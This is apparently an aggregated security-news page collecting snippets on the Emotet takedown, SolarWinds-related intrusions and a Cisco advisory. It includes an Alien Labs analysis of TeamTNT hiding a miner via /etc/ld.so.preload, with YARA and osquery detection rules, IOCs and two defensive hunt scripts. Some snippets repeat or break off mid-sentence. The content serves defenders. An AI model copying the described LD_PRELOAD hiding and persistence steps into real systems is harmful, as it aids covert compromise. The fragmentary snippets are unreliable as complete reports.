THE HAGUE, Netherlands (AP) — European and North American cyber cops have joined forces to disrupt what may be the world’s largest network for seeding malware infections, striking a major blow against criminal gangs that have been using it for years to install ransomware in extortion schemes, steal data and engage in financial theft.

Welcome! Follow our cyber reporter, Maggie Miller (@magmill95), and tech team, Chris Mills Rodrigo (@chrisismills) and Rebecca Klar (@rebeccaklar_), for more coverage. STRONG START FOR BIDEN ON CYBER: President Biden and his administration have hit the ground running on cybersecurity during his….


The illicit tool called EMOTET was operated as a so-called botnet, software that infects a network of computers and allows them to be remotely controlled, Europol and its judicial sister agency Eurojust said. Police based in Britain, Canada, Germany, Lithuania, the Netherlands, Ukraine and the….


Through a coordinated, worldwide action by Europol, Emotet, one of the most significant botnets of recent years, has been taken offline. The authorities have taken over control of Emotet's infrastructure, the European police organisation reports.

Sorin Mustaca’s aggregated IT Security News and articles about information security, vulnerabilities, exploits, patches, releases, software, features, hacks, laws, spam, viruses, malware, breaches.

Read the original article: Emotet malware taken down by global law enforcement effort. The infamous….

A cracked software site that hides the latest version of the DanaBot Trojan (Source: Proofpoint)

Websites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to….


Banking Trojan Hidden in Pirated Software Keys

Websites advertising pirated and cracked software are being used to deliver an updated version of the DanaBot banking Trojan, which can steal individuals’ online banking credentials, according to Proofpoint.



The infamous botnet has been disrupted thanks to an international effort across the US, Canada, and several European nations.

FILE – In this file photo dated Wednesday, Oct. 10, 2018, the Europol headquarters building in The Hague, Netherlands. European and North American cyber cops have joined forces Wednesday Jan. 27, 2021, to disrupt what may be the world’s largest network for seeding malware infections,….


By Waqas: The Emotet malware botnet has been taken down by cybersecurity and law enforcement agencies after a joint global operation.


Read the original article: Cops Disrupt Emotet, the Internet’s ‘Most Dangerous Malware’. A global….


The Emotet malware botnet has been taken down by cybersecurity and law enforcement agencies after a joint global operation. “Bye-bye botnets. Huge global operation brings down the world’s most dangerous malware,” read the tweet posted by Europol after taking down the Emotet botnet.


Original release date: January 27, 2021

CISA has released a malware analysis report on Supernova malware affecting unpatched SolarWinds Orion software. The report contains indicators of compromise (IOCs) and analyzes several malicious artifacts. Supernova is not part of the SolarWinds supply chain attack described in Alert AA20-352A.

CISA encourages users and administrators to review Malware Analysis Report MAR-10319053-1.v1 and the SolarWinds advisory for more information on Supernova.

This product is provided subject to this Notification and this Privacy & Use policy.


For more than half a decade, the malware known as Emotet has menaced the internet, growing into one of the largest botnets in the world and targeting victims with data theft and crippling ransomware. Now a sprawling, global police investigation has culminated in Emotet’s takedown and the arrest of….


A global operation has taken down the notorious botnet in a blow to cybercriminals worldwide.

Last month’s uncovering of the SolarWinds supply chain attack caused waves of panic and chatter across the U.S. and all over the world. How did such a widely-used and important software get breached? And are even the supposedly best-protected companies (and their customers) still at risk of….


New research from Seqrite has found that 13,733 malware threats were detected every hour in 2020. The report showed that, of all threat types, Trojan malware led both quarter-on-quarter (QoQ) and year-on-year (YoY).

According to the research, of the 113 million malware detections, the first quarter recorded the highest total at 36 million detections, and January was the month with the most malware attacks.

Himanshu Dubey, Director, QuickHeal Security Labs said “with the advent of Covid-19, threat actors have realised how they can capitalize on this new opportunity by banking on the new vulnerabilities that have popped up due to remote working or work from home (WFH).” He continued to say that, “attackers are going to innovate and roll out new ways to target businesses in 2021. It is, therefore, essential for them to invest in robust cybersecurity solutions that can prevent them from being prey to the evolving threat landscape.”

The post More than 13,000 malware threats were detected every hour in 2020 appeared first on IT Security Guru.

Image: Moritz Kindler

AT&T Alien Labs security researchers have discovered that the TeamTNT cybercrime group upgraded their Linux crypto-mining with open-source detection evasion capabilities. TeamTNT is mostly known for targeting and compromising Internet-exposed Docker instances for unauthorized Monero (XMR) mining.


Read the original article: Emotet Malware Over the Years: The History of an Active Cyber-Threat [Updated]. Malware strains come and go while Internet users become more and more accustomed to online threats being dealt with swiftly by the competent authorities.

THE HAGUE, Netherlands — Law enforcement authorities in several countries have joined forces to disrupt what they call one of the world’s most dangerous pieces of malware, one that allowed criminal gangs to install ransomware and steal data from computer users.


Law enforcement authorities from Germany, the Netherlands, Ukraine, Lithuania and France, as well as England, Canada and the USA, have jointly brought the infrastructure of the Emotet malware under their control. This was announced by the Federal Criminal Police Office (BKA) and the European police agency Europol….


A malware botnet that was used by cybercriminals to infiltrate thousands of companies and millions of computers worldwide has been taken down in an international operation. The National Crime Agency worked with law enforcement partners across Europe and North America for nearly two years to map the….


Security Advisory. This security advisory describes one low-risk vulnerability.

Description. CWE-427 – Uncontrolled Search Path Element. The vulnerability allows a local user to compromise the vulnerable system. The vulnerability exists due to incorrect handling of directory search paths at run time. A local user can place a specially crafted .

Hundreds of industrial organizations have apparently received a piece of malware named Sunburst as part of the supply chain attack that hit IT management and monitoring firm SolarWinds last year, Kaspersky’s ICS CERT unit reported on Tuesday.

SolarWinds’ analysis of the attack revealed that up to….

Law enforcement and judicial authorities worldwide have this week disrupted one of the most significant botnets of the past decade: EMOTET. Investigators have now taken control of its infrastructure in an internationally coordinated action. This operation is the result of a collaborative effort between….

New Delhi: With new techniques targeting a completely new setup of the global enterprise, 13,733 malware threats were detected every hour in 2020, with Trojan leading the year-on-year (YoY) and quarter-on-quarter (QoQ) charts followed by other

solutions brand by Quick Heal Technologies, out of the….

Protection Phone Site Protection Phone Site or Protection-phone1.site is a questionable website that can access your Calendar app on iPhone/Mac/iPad devices and start showing fake alert messages. For the sake of your device security, you should be skeptical about the. by

Notification-fix1.best Virus Notification-fix1.


Executive Summary

AT&T Alien Labs™ has identified a new tool from the TeamTNT adversary group, which has been previously observed targeting exposed Docker infrastructure for cryptocurrency mining purposes and credential theft. The group is using a new detection evasion tool, copied from open source repositories.

The purpose of this blog is to share new technical intelligence and provide detection and analysis options for defenders.

Background

AT&T Alien Labs previously reported on TeamTNT cryptomining malware using a new memory loader based on Ezuri and written in Golang. Since then, TeamTNT has added another tool to their list of capabilities.

Analysis

The objective of the new tool is to hide the malicious process from process information programs such as `ps` and `lsof`, effectively acting as a defense evasion technique.

The tool, named libprocesshider, is an open source tool from 2014 hosted on GitHub and described as “hide a process under Linux using the ld preloader.” Preloading makes the dynamic loader load a custom shared library before the other system libraries. If the custom shared library exports a function with the same signature as one located in the system libraries, the custom version overrides it.

The tool implements the function readdir(), which processes such as `ps` use to read the /proc directory and find running processes, and modifies the return value whenever a process found matches the process that is to be hidden.

The new tool arrives within a base64 encoded script hidden in the TeamTNT cryptominer binary or ircbot (figure 1):


Figure 1. base64 encoded script, via Alien Labs analysis.

Upon binary execution, the bash script will run through a multitude of tasks. Specifically, the script will:

Modify the network DNS configuration.

Set persistence through systemd.

Drop and activate the new tool as service.

Download the latest IRC bot configuration.

Clear evidence of activities to complicate potential defender actions.

After decoding, we can observe the bash script functionality and how some malicious activity occurs before the shared library is created (figure 2):


Figure 2. Decoded bash script, via Alien Labs analysis.

The new tool is first dropped on disk as a hidden tar file; the script decompresses it, writes it to ‘/usr/local/lib/systemhealt.so’, and then registers it for preloading via ‘/etc/ld.so.preload’. The system will use this file to preload the library before other system libraries, allowing the attacker to override some common functions (figures 3/4).


Figure 3/4. bash script features, via Alien Labs analysis.

The main purpose of the tool is to hide the TeamTNT bot (the file ‘/usr/bin/sbin’) from process viewer tools, as can be seen in Figures 3 and 4 (SETUP_IRCBOT function).

As a final step, the malware removes traces by deleting the bash history:


Figure 5. bash script cleanup, via Alien Labs analysis.

Conclusion

Through the use of libprocesshider, TeamTNT once again expands their capabilities based on the available open source tools. While libprocesshider's functionality is limited to evading detection and a few other basic functions, its presence is an indicator to consider when hunting for malicious activity at the host level. Alien Labs will continue to monitor the threat and report on any noteworthy activity.

Appendix A. Detection Methods

The following associated detection methods are in use by Alien Labs. They can be used by readers to tune or deploy detections in their own environments or for aiding additional research.

SURICATA IDS SIGNATURES

AV TROJAN TeamTNT CoinMiner Payload Download to clean up other Coinminers

AV TROJAN TeamTNT Mining Worm Credential Exfiltration

AV TROJAN TeamTNT CoinMiner Downloader

ET TROJAN Observed TrojanSpy.SH.HADGLIDER.A Exfil Domain in DNS Query

YARA RULES

```yara
rule teamTNT_hideproc
{
    meta:
        sha256 = "02cde4109a12acb499953aa8c79917455b9f49837c7c1dbb13cbcf67e86a1555"

    strings:
        $code1 = { 48 8B 15 ?? ?? 00 00 48 8B 85 ?? ?? FF FF 48 89 C7 FF D2 48 89 [2-5] 48 [3-6] 00 74 ?? 48 8D 8D F0 FD FF FF 48 8B 85 ?? FD FF FF BA 00 01 00 00 48 89 CE 48 89 C7 E8 ?? FD FF FF 85 C0 74 ?? 48 8D 85 F0 FD FF FF 48 8D 35 ?? ?? 00 00 48 89 C7 E8 ?? ?? FF FF 85 C0 75 ?? 48 8B [2-5] 48 8D 50 13 48 8D 85 F0 FE FF FF 48 89 C6 48 89 D7 E8 ?? ?? FF FF 85 C0 74 22 48 8B 15 ?? ?? 00 00 48 8D 85 F0 FE FF FF 48 89 D6 48 89 C7 E8 ?? ?? FF FF 85 C0 }
        $s1 = "readdir64"
        $s2 = "dlsym"
        $s3 = "_ITM_deregisterTMCloneTable"
        $s4 = "frame_dummy"

    condition:
        uint16(0) == 0x457f and
        filesize < 25000 and
        all of them
}
```

AGENT SIGNATURES

```json
{
  "detection_suspicious_ld_preload_environment_variable": {
    "platform": "linux",
    "description": "Detects usage of the ld_preload env variable ",
    "query": "SELECT process_envs.pid as source_process_id, process_envs.key as environment_variable_key, process_envs.value as environment_variable_value, processes.name as source_process, processes.path as file_path, processes.cmdline as source_process_commandline, processes.cwd as current_working_directory, 'T1055' as event_attack_id, 'Process Injection' as event_attack_technique, 'Defense Evasion, Privilege Escalation' as event_attack_tactic FROM process_envs join processes USING (pid) WHERE key = 'LD_PRELOAD';",
    "interval": "60",
    "removed": "false"
  }
}
```
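The agent signature above catches the LD_PRELOAD environment variable, but the TeamTNT script uses ‘/etc/ld.so.preload’, which leaves no variable behind. The following hunt script is an added example (not Alien Labs' code) that covers both paths and adds a third check: a hooked readdir() can filter the /proc listing that `ps` sees, but it cannot make stat("/proc/<pid>") fail for a live process, so PIDs found by direct probing yet missing from the listing are candidates for a hidden process. The trusted library directories and the sample inputs are assumptions constructed for the example.

```python
"""Hunt for LD_PRELOAD-based process hiding (libprocesshider style) on a Linux host.

Each check is a pure function over constructed input plus a thin live wrapper
over /proc, so the logic runs and can be tested without a compromised machine.
"""
import os
from typing import Dict, Iterable, List, Optional

# Assumption: legitimately preloaded libraries live only in the distro library dirs.
TRUSTED_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")

# Constructed samples, mirroring the path the TeamTNT script writes.
SAMPLE_LD_SO_PRELOAD = "/usr/local/lib/systemhealt.so\n/lib/x86_64-linux-gnu/libc.so.6\n"
SAMPLE_ENVIRON = b"PATH=/usr/bin\0LD_PRELOAD=/usr/local/lib/systemhealt.so\0HOME=/root\0"


def suspicious_preload_entries(ld_so_preload_text: str) -> List[str]:
    """Entries of /etc/ld.so.preload (whitespace-separated) outside the trusted dirs.

    Anything listed there is injected into every dynamically linked process,
    so on a clean host the file is normally absent or empty.
    """
    return [entry for entry in ld_so_preload_text.split()
            if not entry.startswith(TRUSTED_LIB_DIRS)]


def ld_preload_from_environ(environ_blob: bytes) -> Optional[str]:
    """Extract LD_PRELOAD from a /proc/<pid>/environ blob (NUL-separated KEY=VALUE)."""
    for item in environ_blob.split(b"\0"):
        if item.startswith(b"LD_PRELOAD="):
            return item[len(b"LD_PRELOAD="):].decode("utf-8", "replace")
    return None


def hidden_pids(listed: Iterable[int], probed: Iterable[int]) -> List[int]:
    """PIDs that a direct stat() probe found but the readdir() listing did not."""
    return sorted(set(probed) - set(listed))


def listed_pids() -> List[int]:
    """PIDs as seen through readdir() on /proc: the path ps, lsof and os.listdir take."""
    return [int(name) for name in os.listdir("/proc") if name.isdigit()]


def probed_pids(max_pid: Optional[int] = None) -> List[int]:
    """PIDs found by stat()-ing /proc/<pid> directly, never calling readdir()."""
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as fh:
            max_pid = int(fh.read())
    # os.path.exists() is a stat() call, so a hooked readdir() has no say here.
    return [pid for pid in range(1, max_pid + 1) if os.path.exists(f"/proc/{pid}")]


def hunt() -> Dict[str, object]:
    """Run all three checks on the live host and return the findings."""
    report: Dict[str, object] = {"preload": [], "ld_preload_env": {}, "hidden_pids": []}
    try:
        with open("/etc/ld.so.preload") as fh:
            report["preload"] = suspicious_preload_entries(fh.read())
    except FileNotFoundError:
        pass                                   # absent file is the normal state
    env_hits: Dict[int, str] = {}
    for pid in listed_pids():
        try:
            with open(f"/proc/{pid}/environ", "rb") as fh:
                value = ld_preload_from_environ(fh.read())
        except OSError:                        # process exited, or not ours to read
            continue
        if value:
            env_hits[pid] = value
    report["ld_preload_env"] = env_hits
    # Processes start and exit between the two scans, so re-check each candidate
    # against a fresh listing before reporting it as hidden.
    candidates = hidden_pids(listed_pids(), probed_pids())
    fresh = set(listed_pids())
    report["hidden_pids"] = [p for p in candidates
                             if p not in fresh and os.path.exists(f"/proc/{p}")]
    return report


if __name__ == "__main__":
    print("sample preload findings:", suspicious_preload_entries(SAMPLE_LD_SO_PRELOAD))
    print("sample environ LD_PRELOAD:", ld_preload_from_environ(SAMPLE_ENVIRON))
    for key, value in hunt().items():
        print(f"{key}: {value}")
```

Probing every PID up to pid_max is a few million stat() calls on modern kernels, so the live scan takes seconds rather than milliseconds; run it as root to read every process's environ.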

 

Appendix B. Associated Indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities related but out of the scope of the blog.

| Type | Indicator | Description |
|---|---|---|
| SHA256 | 73dec430b98ade79485f76d405c7a9b325df7492b4f97985499a46701553e34a | ezuri packed, TeamTNT CryptoMiner |
| SHA256 | cb013be7b5269c035495222198ec708c026c8db838031af60fd0bd984f34226f | TeamTNT CryptoMiner |
| SHA256 | 02cde4109a12acb499953aa8c79917455b9f49837c7c1dbb13cbcf67e86a1555 | TeamTNT hideprocess (systemhealt.so) |
| SHA256 | b666cd08b065132235303727f2d77997a30355ae0e5b557cd08d41c9ade7622d | ziggy_spread – TeamTNT IRC bot |
| Domain | kaiserfranz[.]cc | C2 Server |

Feedback

AT&T Alien Labs welcomes feedback about this blog. Please contact the Alien Labs blog author or contact labs@alienvault.com. 


Posted by: Ofer Caspi


“Download This application and Win Mobile Phone”, reads the message attempting to trick users into downloading a fake Huawei app

The post Wormable Android malware spreads via WhatsApp messages appeared first on WeLiveSecurity


Skyrocketing Bitcoin Prices See Resurgence in Mining Malware

As the price of cryptocurrency, Bitcoin, continues to push to record heights, so have we seen a rise in crypto-mining malware. When Bitcoin values decreased in recent years, these types of illicit miners slipped off the radar, but it comes as no surprise that the authors are hoping to profit over the latest price increase. Researchers have even identified multiple forms of crypto-miners, from browser-based applications to completely fileless script miners, which are used for a variety of system configurations.

Major Increase in Malicious Vaccine-related Domains

In the month following the release of the first COVID-19 vaccine for public availability, the number of domains with ‘vaccine’ in the title increased 94.8% over the previous month. As with the popularity of malicious COVID-related domains being registered in March of last year, cybercriminals are taking advantage of the pandemic’s hold over the general public in order to profit. With over 2,000 new domains with COVID-related keywords being created, the real worry is how to find accurate and reliable information amongst the surge of illegitimate sites.

Millions of Nitro PDF User Records Leaked

A database containing over 77 million user records belonging to Nitro PDF has been found available for free on a Dark Web marketplace. The leaked data was initially part of the October data breach that Nitro confirmed and was bundled for auction with a high price tag. Now, several months later, a member of the known hacking group ShinyHunters has released access to the download link for a mere $3.

Scottish EPA Falls Victim to Ransomware Attack

Officials for the Scottish Environmental Protection Agency (SEPA) have confirmed that data stolen in a ransomware attack last month has been posted for sale on the Dark Web by the group responsible for the Conti ransomware variant. While it is still unclear how the attackers gained access to the agency’s systems, many of the infected systems are still non-operational and have no estimated time for full recovery.

Hackers Leak Nearly 2 Million Pixlr Records

In the past couple of days, the ShinyHunters hacking group has posted a database containing nearly 2 million user records for the Pixlr photo editing application. The group claims they stole the database during another data breach at another photo site, 123rf; both are owned by Inmagine. Though Pixlr has yet to confirm the breach, users should change their passwords and update any other sites that may share the same credentials.

The post Cyber News Rundown: Crypto-Mining Malware Resurges appeared first on Webroot Blog.


By Nick Kael, CTO at Ericom

The browser is the target

Last week, Google’s Project Zero exploit research team published reports detailing a sophisticated cyber operation that targeted vulnerabilities in Chrome and Windows, installing malware to exploit weaknesses in the browser and operating system to compromise endpoints. Some of the advanced malware targeted vulnerabilities that were, at the time, unknown to Google and Microsoft. These included: CVE-2020-6418—Chrome Vulnerability in TurboFanCV…


Publication date: 01/19/2021

The UK Department for Education has reported that some of the more than 800,000 laptops given to UK schools because of the pandemic contained malware.

The infection was discovered by teachers at Brandford School after they posted the suspicious files on an online forum. The malware in question is the well-known Gamarue worm, which was identified by Microsoft in 2012 and whose purpose is to install spyware which may collect browsing, personal or banking data.

Currently, the Department for Education is urgently investigating the incident with the help of experts and the company Geo, the manufacturer of the equipment. So far, the actual scope of the problem is unknown, and schools are advised to check their networks, restart computers in safe mode and carry out anti-virus scans.

01/19/2021

Tags:
#CyberCOVID19, Cybercrime, Cyberespionage, Malware, Other critical infrastructures, Public administration, Tool

References:

| Reference | Source | URL | Date | External | Target language | Content language |
|---|---|---|---|---|---|---|
| Malware found on laptops given out by government | bbc.com | https://www.bbc.com/news/technology-55749959 | 19/01/2021 | yes | en | en |
| UK govt gives malware infected laptops to vulnerable students | bleepingcomputer.com | https://www.bleepingcomputer.com/news/security/uk-govt-gives-malware-infected-laptops-to-vulnerable-students/ | 21/01/2021 | yes | en | en |
| UK Government Distributes Malware-Ridden Laptops to Students | technadu.com | https://www.technadu.com/uk-government-distributes-malware-ridden-laptops-students/242704/ | 22/01/2021 | yes | en | en |

The Taiwanese NAS device vendor QNAP has issued an advisory warning customers about a new piece of malware targeting NAS devices. The malware, named Dovecat, is designed to abuse NAS resources to mine cryptocurrency. Security Affairs and others report this.

The malware targets QNAP NAS devices that are exposed online and have weak passwords.

Language: Danish

Read more about QNAP warns users about malware

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
AUSCERT External Security Bulletin Redistribution

ESB-2021.0245
Cisco Advanced Malware Protection for Endpoints and Immunet
for Windows DLL Hijacking Vulnerability
21 January 2021

===========================================================================

AusCERT Security Bulletin Summary
---------------------------------

Product: Cisco Advanced Malware Protection for Endpoints and Immunet for Windows
Publisher: Cisco Systems
Operating System: Windows
Impact/Access: Execute Arbitrary Code/Commands -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1280

Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV

- --------------------BEGIN INCLUDED TEXT--------------------

Cisco Advanced Malware Protection for Endpoints and Immunet for Windows DLL
Hijacking Vulnerability

Priority: High
Advisory ID: cisco-sa-amp-imm-dll-5PAZ3hRV
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvv53346
CVE Names: CVE-2021-1280
CWEs: CWE-427

Summary

o A vulnerability in the loading mechanism of specific DLLs of Cisco Advanced
Malware Protection (AMP) for Endpoints for Windows and Immunet for Windows
could allow an authenticated, local attacker to perform a DLL hijacking
attack. To exploit this vulnerability, the attacker would need valid
credentials on the Windows system.

This vulnerability is due to incorrect handling of directory search paths
at run time. An attacker could exploit this vulnerability by placing a
malicious DLL file on the targeted system. This file will execute when the
vulnerable application launches. A successful exploit could allow the
attacker to execute arbitrary code on the targeted system with SYSTEM
privileges.

Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV

Affected Products

o Vulnerable Products

This vulnerability affects the following products:

All Cisco AMP for Endpoints for Windows releases earlier than Release
7.3.3
All Immunet for Windows releases earlier than Release 7.3.12

Products Confirmed Not Vulnerable

Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.

Cisco has confirmed that this vulnerability does not affect the following
Cisco products:

AMP for Endpoints for Linux
AMP for Endpoints for Mac

Workarounds

o There are no workarounds that address this vulnerability.

Fixed Software

o Cisco has released free software updates that address the vulnerability
described in this advisory. Customers may only install and expect support
for software versions and feature sets for which they have purchased a
license. By installing, downloading, accessing, or otherwise using such
software upgrades, customers agree to follow the terms of the Cisco
software license:
https://www.cisco.com/c/en/us/products/end-user-license-agreement.html

Additionally, customers may only download software for which they have a
valid license, procured from Cisco directly, or through a Cisco authorized
reseller or partner. In most cases this will be a maintenance upgrade to
software that was previously purchased. Free security software updates do
not entitle customers to a new software license, additional software
feature sets, or major revision upgrades.

When considering software upgrades, customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page, to determine exposure and a complete
upgrade solution.

In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.

Customers Without Service Contracts

Customers who purchase directly from Cisco but do not hold a Cisco service
contract and customers who make purchases through third-party vendors but
are unsuccessful in obtaining fixed software through their point of sale
should obtain upgrades by contacting the Cisco TAC:
https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html

Customers should have the product serial number available and be prepared
to provide the URL of this advisory as evidence of entitlement to a free
upgrade.

Fixed Releases

Cisco fixed this vulnerability in the following releases:

Cisco AMP for Endpoints for Windows releases 7.3.3 and later
Immunet for Windows releases 7.3.12 and later

Exploitation and Public Announcements

o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any malicious use of the vulnerability that is described in this advisory.

Source

o Cisco would like to thank Hou JingYi of Qihoo 360 CERT for initially
reporting this vulnerability. Cisco would also like to thank Kyriakos
Economou and Tom Wilson of ZeroPeril Ltd. for their report on this
vulnerability.

Cisco Security Vulnerability Policy

o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy. This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.

URL

o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-amp-imm-dll-5PAZ3hRV

Revision History

o +---------+---------------------------+---------+--------+--------------+
| Version | Description               | Section | Status | Date         |
+---------+---------------------------+---------+--------+--------------+
| 1.0     | Initial public release.   | -       | Final  | 2021-JAN-20  |
+---------+---------------------------+---------+--------+--------------+

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation’s
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT’s members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation’s
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author’s website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================

A nation state attack leveraging software from SolarWinds has caused a ripple effect throughout the security industry, impacting multiple organizations. We first reported on the event in our December 14 blog and notified our business customers using SolarWinds asking them to take precautionary measures.

While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor. We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments. After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails. We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.

How did this impact Malwarebytes?

We received information from the Microsoft Security Response Center on December 15 about suspicious activity from a third-party application in our Microsoft Office 365 tenant consistent with the tactics, techniques and procedures (TTPs) of the same advanced threat actor involved in the SolarWinds attacks.

We immediately activated our incident response group and engaged Microsoft’s Detection and Response Team (DART). Together, we performed an extensive investigation of both our cloud and on-premises environments for any activity related to the API calls that triggered the initial alert. The investigation indicates the attackers exploited an Azure Active Directory weakness that allowed access to a limited subset of internal company emails. We do not use Azure cloud services in our production environments.

Considering the supply chain nature of the SolarWinds attack, and in an abundance of caution, we immediately performed a thorough investigation of all Malwarebytes source code, build and delivery processes, including reverse engineering our own software. Our internal systems showed no evidence of unauthorized access or compromise in any on-premises and production environments. Our software remains safe to use.

What we know: SolarWinds Attackers Also Target Administrative and Service Credentials

As the US Cybersecurity and Infrastructure Security Agency (CISA) stated, the adversary did not only rely on the SolarWinds supply-chain attack but indeed used additional means to compromise high-value targets by exploiting administrative or service credentials.

In 2019, a security researcher exposed a flaw in Azure Active Directory where one could escalate privileges by assigning credentials to applications. In September 2019, he found that the vulnerability still existed and essentially led to backdoor access to principals' credentials for Microsoft Graph and Azure AD Graph.

Third-party applications can be abused if an attacker with sufficient administrative privilege gains access to a tenant. A newly released CISA report reveals how threat actors may have obtained initial access by password guessing or password spraying in addition to exploiting administrative or service credentials. In our particular instance, the threat actor added a self-signed certificate with credentials to the service principal account. From there, they can authenticate using the key and make API calls to request emails via MSGraph.

For many organizations, securing Azure tenants may be a challenging task, especially when dealing with third-party applications or resellers. CrowdStrike has released a tool to help companies identify and mitigate risks in Azure Active Directory.
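One concrete check for the credential abuse described above is to look for key or password credentials that appeared on service principals after a baseline date and that nobody can account for. The script below is an added example, not Malwarebytes', Microsoft's or CrowdStrike's code; its input is a constructed record modelled on the Microsoft Graph servicePrincipal object (keyCredentials / passwordCredentials arrays), and the service principal names and key ids in it are hypothetical.

```python
"""Hunt for service-principal credentials added after a baseline date.
Added example, not code from Malwarebytes, Microsoft or CrowdStrike.
SAMPLE_RESPONSE is constructed and modelled on the Microsoft Graph
servicePrincipal object; a real run would feed in the response of
GET https://graph.microsoft.com/v1.0/servicePrincipals?$select=id,displayName,keyCredentials,passwordCredentials
"""
import json
from datetime import datetime, timezone

# Constructed sample: two hypothetical service principals, one of which gained
# a certificate credential on a date the tenant owner cannot account for.
SAMPLE_RESPONSE = json.dumps({"value": [
    {
        "id": "11111111-aaaa-4bbb-8ccc-000000000001",
        "displayName": "Mail Archiver (hypothetical)",
        "keyCredentials": [
            {"keyId": "k-vendor-2020", "type": "AsymmetricX509Cert", "usage": "Verify",
             "displayName": "CN=vendor-issued",
             "startDateTime": "2020-03-01T00:00:00Z", "endDateTime": "2022-03-01T00:00:00Z"},
            {"keyId": "k-unexplained", "type": "AsymmetricX509Cert", "usage": "Verify",
             "displayName": "CN=self-signed (constructed)",
             "startDateTime": "2020-12-14T03:12:00Z", "endDateTime": "2021-12-14T03:12:00Z"},
        ],
        "passwordCredentials": [],
    },
    {
        "id": "11111111-aaaa-4bbb-8ccc-000000000002",
        "displayName": "Build Bot (hypothetical)",
        "keyCredentials": [],
        "passwordCredentials": [
            {"keyId": "p-build-2019", "displayName": "ci secret",
             "startDateTime": "2019-06-01T00:00:00Z", "endDateTime": "2021-06-01T00:00:00Z"},
        ],
    },
]})


def parse_graph_time(value: str) -> datetime:
    """Graph returns ISO-8601 UTC timestamps with a trailing Z."""
    return datetime.fromisoformat(value.replace("Z", "+00:00")).astimezone(timezone.utc)


def find_recent_credentials(response_json: str, since: str, known_key_ids=()):
    """Return one dict per credential whose startDateTime is on or after `since`
    and whose keyId is not on the allow-list of credentials the owner expects.
    Both certificate (keyCredentials) and secret (passwordCredentials) entries
    are checked, because either one lets a holder authenticate as the app."""
    cutoff = parse_graph_time(since)
    known = set(known_key_ids)
    hits = []
    for sp in json.loads(response_json).get("value", []):
        for kind in ("keyCredentials", "passwordCredentials"):
            for cred in sp.get(kind) or []:
                start = parse_graph_time(cred["startDateTime"])
                if start >= cutoff and cred["keyId"] not in known:
                    hits.append({
                        "servicePrincipalId": sp["id"],
                        "displayName": sp.get("displayName"),
                        "credentialType": kind,
                        "keyId": cred["keyId"],
                        "credentialName": cred.get("displayName"),
                        "startDateTime": start.isoformat(),
                    })
    return hits


if __name__ == "__main__":
    for hit in find_recent_credentials(SAMPLE_RESPONSE, since="2020-12-01T00:00:00Z"):
        print(f"{hit['displayName']}: {hit['credentialType']} {hit['keyId']} "
              f"added {hit['startDateTime']}")
```

Every hit still needs a human to confirm who added the credential and which permissions (for example mail-reading Graph roles) the service principal holds.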

Coming together as an industry

While we have learned a lot of information in a relatively short period of time, there is much more yet to be discovered about this long and active campaign that has impacted so many high-profile targets. It is imperative that security companies continue to share information that can help the greater industry in times like these, particularly with such new and complex attacks often associated with nation state actors.

We would like to thank the security community, particularly FireEye, CrowdStrike, and Microsoft for sharing so many details regarding this attack. In an already difficult year, security practitioners and incident responders responded to the call of duty and worked throughout the holiday season, including our own dedicated employees. The security industry is full of exceptional people who are tirelessly defending others, and today it is strikingly evident just how essential our work is moving forward.

The post Malwarebytes targeted by Nation State Actor implicated in SolarWinds breach. Evidence suggests abuse of privileged access to Microsoft Office 365 and Azure environments appeared first on Malwarebytes Labs.


